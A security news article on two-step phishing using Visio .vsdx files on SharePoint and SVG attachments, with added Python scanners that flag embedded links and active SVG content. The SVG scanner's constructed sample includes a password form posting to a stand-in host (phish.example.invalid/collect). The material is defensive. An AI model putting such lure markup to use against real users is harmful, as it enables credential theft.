Update, Nov. 18, 2024: This story, originally published Nov. 17, now includes a new report of another tactic increasingly being used by threat actors in phishing cyber attacks.
Just as security professionals will tell you that layered defensive strategies are the best when it comes to staving off successful attacks, so attackers will often adopt precisely the same layered approach when executing their cyber attacks. Two-step phishing attacks have, in the words of security researchers from Perception Point, “become a cornerstone of modern cybercrime,” leveraging trusted platforms “to deliver malicious content in layers to evade detection.” Everything changes, but everything stays the same. Those same researchers have now warned of a new attack methodology employing such two-step phishing (2SP) tactics, this time with Microsoft Visio files serving as a new evasion technique. Here’s what you need to look out for and what steps you can take to mitigate the risk of falling victim to these new 2SP cyber attacks.
Two-Step Cyber Attacks Are The Pinnacle Of Phishing By Design
A new analysis published by Peleg Cabra, the product marketing manager at Perception Point, has revealed how security researchers working for the vendor have found threat actors increasingly turning to Microsoft Visio .vsdx format files to evade detection during credential-stealing cyber attacks.
Because Visio is a commonly used workplace tool for visualizing complex data or workflows, .vsdx files fit nicely into the threat actor strategy of “harmless familiarity” that lies at the heart of many a phishing attack. Now, the Perception Point researchers said, those same files are being weaponized to deliver malicious URLs as part of a two-step phishing scenario: drop the lure, set the trap.
Describing what they referred to as a “dramatic increase in two-step phishing attacks leveraging .vsdx files,” the security researchers explained how the cyber attacks represented “a sophistication of two-step phishing tactics, targeting hundreds of organizations worldwide with a new layer of deception designed to evade detection and exploit user trust.”
Evolution Of The Two-Step Phishing Cyber Attacks
If such a warning were necessary, here it comes: email account security is vital if cyber attacks such as these latest two-step phishing ones are to be stopped. Why so? Because, the researchers said, the attacks start with threat actors leveraging breached email accounts to send emails that pass basic authentication checks, since they come from genuine domains.
These emails contain a common phishing component designed to lure the recipient into the trap: a business proposal or a purchase order, accompanied by an urgent request to view and respond. Of course, when the victim does just that and clicks the URL, they are led to the trap itself: a Microsoft SharePoint page, often a compromised one, but in any case one hosting a .vsdx Visio file. The layers of the cyber attack start unraveling at this point, with another URL embedded in that file behind what the researchers described as a clickable call-to-action, most commonly a “view document” button.
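A .vsdx file is an Open Packaging Conventions (OPC) zip archive of XML parts, so the URL hidden behind a “view document” button can be pulled out of an attachment before anyone has to hold down Ctrl and click. The following scanner is an added example written for this article, not code from Perception Point or Microsoft: it walks every part of the package, collects external relationship targets from the `.rels` parts and any http(s) URL found in the XML parts (Visio stores a shape’s hyperlink in a `Hyperlink` section’s `Address` cell), and reports links whose host is not on an allowlist. The `build_sample_vsdx()` package, the `phish.example.invalid` host and the `SCHEMA_HOSTS` ignore list are constructed assumptions for the demo; a real Visio package carries many more parts than this minimal one.

```python
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# OPC relationship namespace; .vsdx, .docx and .xlsx packages all use it.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Hosts that show up in schema and namespace identifiers rather than in real links.
# Assumption: this short ignore list is good enough for the demo.
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


def _is_web_url(value: str) -> bool:
    parts = urlsplit(value.strip())
    return (parts.scheme in ("http", "https")
            and parts.hostname is not None
            and parts.hostname not in SCHEMA_HOSTS)


def extract_urls(package: bytes) -> list[tuple[str, str]]:
    """Return sorted, de-duplicated (part name, URL) pairs found in an OPC package.

    .rels parts: targets of relationships marked TargetMode="External".
    .xml parts:  any attribute value or text node that is an http(s) URL
                 (this is where a Visio shape's Hyperlink Address cell lives).
    """
    hits: set[tuple[str, str]] = set()
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith((".rels", ".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                hits.add((name, "<unparseable XML part>"))
                continue
            for el in root.iter():
                if name.endswith(".rels"):
                    if el.tag == RELS_NS + "Relationship" and el.get("TargetMode") == "External":
                        hits.add((name, el.get("Target", "")))
                    continue
                for value in list(el.attrib.values()) + [el.text or ""]:
                    if _is_web_url(value):
                        hits.add((name, value.strip()))
    return sorted(hits)


def untrusted_links(hits: list[tuple[str, str]], trusted_hosts: set[str]) -> list[tuple[str, str]]:
    """Keep only links whose host is not allowlisted (unparseable parts are kept too)."""
    return [(part, url) for part, url in hits if urlsplit(url).hostname not in trusted_hosts]


# --- constructed sample package (minimal, not a full Visio document) ---------------
PAGE_XML = (
    "<PageContents xmlns='http://schemas.microsoft.com/office/visio/2012/main'>"
    "<Shapes><Shape ID='1' Type='Shape'><Text>View Document</Text>"
    "<Section N='Hyperlink'><Row N='Row_1'>"
    "<Cell N='Address' V='https://phish.example.invalid/login'/>"  # constructed lure URL
    "<Cell N='Description' V='View Document'/>"
    "</Row></Section></Shape></Shapes></PageContents>"
)
PAGE_RELS = (
    "<Relationships xmlns='http://schemas.openxmlformats.org/package/2006/relationships'>"
    "<Relationship Id='rId1' TargetMode='External' Target='https://phish.example.invalid/login' "
    "Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink'/>"
    "<Relationship Id='rId2' Target='../masters/masters.xml' "
    "Type='http://schemas.microsoft.com/visio/2010/relationships/masters'/>"
    "</Relationships>"
)


def build_sample_vsdx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("visio/pages/page1.xml", PAGE_XML)
        zf.writestr("visio/pages/_rels/page1.xml.rels", PAGE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    links = extract_urls(build_sample_vsdx())
    for part, url in untrusted_links(links, {"sharepoint.example"}):  # assumed allowlist
        print(f"untrusted link in {part}: {url}")
```

Run as a mail-gateway or sandbox pre-filter, a non-empty result from `untrusted_links` is enough to quarantine the attachment for review; the scanner never opens the link, it only reports where in the package it sits.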
Please Hold Down The Ctrl Key Is An Instruction In These Newly Uncovered 2SP Cyber Attacks
This is where these 2SP cyber attacks get really clever, although I hate applying that word to cybercriminals. “To access the embedded URL, victims are instructed to hold down the Ctrl key and click,” the Perception Point researchers said, “a subtle yet highly effective action designed to evade email security scanners and automated detection tools.” By asking for this human interaction, the attackers hope to bypass automated systems that don’t expect such behavior in an attack.
The victim is now redirected to another fake page, this time one that looks, for all intents and purposes, to be a Microsoft 365 portal login page, designed, of course, to steal user credentials. There is no mention in the Perception Point report of this step including a session cookie compromise tactic, which means that one way to stop it from being successful would be to have robust two-factor authentication in place for the account that is being targeted in such cyber attacks.
Scalable Vector Graphics Are Deployed In New Cyber Attacks—Here’s How
According to a new report by Lawrence Abrams, the editor-in-chief at Bleeping Computer, threat actors are increasingly using another clever tactic: scalable vector graphics (SVG) files sent as attachments in phishing cyber attacks. The technique is designed either to display malicious forms to the victim or to deploy malware directly, in both cases while evading detection by security software. It relies on the fact that, unlike pixel-based images, scalable vector graphics are built from mathematical instructions describing how lines, shapes and text should be drawn on the screen. Security researcher MalwareHunterTeam told Bleeping Computer that threat actors are exploiting the fact that SVG attachments can display HTML and execute JavaScript when the image itself is loaded. The clever bit is that these capabilities are used to create credential-stealing forms. Abrams demonstrated how such a technique could display an Excel spreadsheet complete with an embedded login form that sends credentials to the threat actor behind the cyber attacks. Other cyber attacks, it has been noted, embed JavaScript within the SVG attachment to redirect the browser to sites hosted by the threat actors when the image is opened.
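Because an SVG is plain XML, the very properties that make it useful to an attacker (script elements, embedded HTML via `foreignObject`, event handler attributes, clickable links) are also easy to enumerate before the file ever reaches a browser. The inspector below is an added example for this article, not code from Bleeping Computer or MalwareHunterTeam; it parses an attachment with the standard library and returns a list of findings. The two sample images and the `phish.example.invalid` host are constructed for the demo, and the script body is a placeholder comment rather than real redirect code.

```python
from __future__ import annotations

import xml.etree.ElementTree as ET
from urllib.parse import urlsplit


def _local(tag: str) -> str:
    """Strip the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return tag.rsplit("}", 1)[-1]


def inspect_svg(svg_text: str) -> list[str]:
    """Return human-readable findings for active or phishing-relevant SVG content.

    An empty list means nothing suspicious was found; the caller decides policy.
    """
    findings: list[str] = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append("script element")
        elif tag == "foreignObject":
            findings.append("foreignObject element (embedded HTML)")
        elif tag == "form":  # HTML form smuggled inside a foreignObject
            findings.append(f"form element posting to {el.get('action')}")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload, onclick, ... run JavaScript when the image renders
                findings.append(f"event handler attribute {name}")
            if name == "href":  # covers both href and xlink:href
                target = value.strip()
                if target.lower().startswith("javascript:"):
                    findings.append("javascript: URI in href")
                elif urlsplit(target).scheme in ("http", "https"):
                    findings.append(f"external link {target}")
    return findings


# --- constructed samples ------------------------------------------------------------
# A lure styled as a spreadsheet with an embedded login form, a link, an onload handler
# and a script element. The script body is a placeholder, not working redirect code.
SAMPLE_PHISH_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="400" height="300" onload="init()">
  <rect width="400" height="300" fill="#e8e8e8"/>
  <text x="20" y="40">Invoice_2024.xlsx</text>
  <foreignObject x="20" y="60" width="360" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml"
          action="https://phish.example.invalid/collect" method="post">
      <input type="password" name="pw"/>
    </form>
  </foreignObject>
  <a xlink:href="https://phish.example.invalid/open"><text x="20" y="280">Open document</text></a>
  <script>/* constructed sample: a real attachment would carry redirect code here */</script>
</svg>"""

# An ordinary static icon, the kind a developer might legitimately receive.
SAMPLE_BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24">
  <circle cx="12" cy="12" r="10" fill="#3366cc"/>
</svg>"""


if __name__ == "__main__":
    for label, svg in (("phish", SAMPLE_PHISH_SVG), ("benign", SAMPLE_BENIGN_SVG)):
        found = inspect_svg(svg)
        print(f"{label}: {'SUSPICIOUS' if found else 'clean'}")
        for f in found:
            print("  -", f)
```

The benign icon produces no findings while the lure produces five, which is the practical point: a gateway rule that quarantines any SVG attachment with at least one finding catches the forms and redirects described above without having to understand what the script would do.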
Mitigating SVG Attachment Cyber Attacks
“The problem is that since these files are mostly just textual representations of images,” Abrams said, “they tend not to be detected by security software that often.” This means that the last line of defense is the same as the first: you, the human being. Ask yourself why you would be getting an attachment in scalable vector graphics format in the first place, if these are not commonplace within your workflow. If you are a developer or someone else who is used to seeing SVG attachments, then ask yourself who is sending them and whether this is normal behavior for them. Treat all emails that come with an SVG attachment as suspicious, and that way, you might just save yourself and your organization from falling victim to these phishing cyber attacks.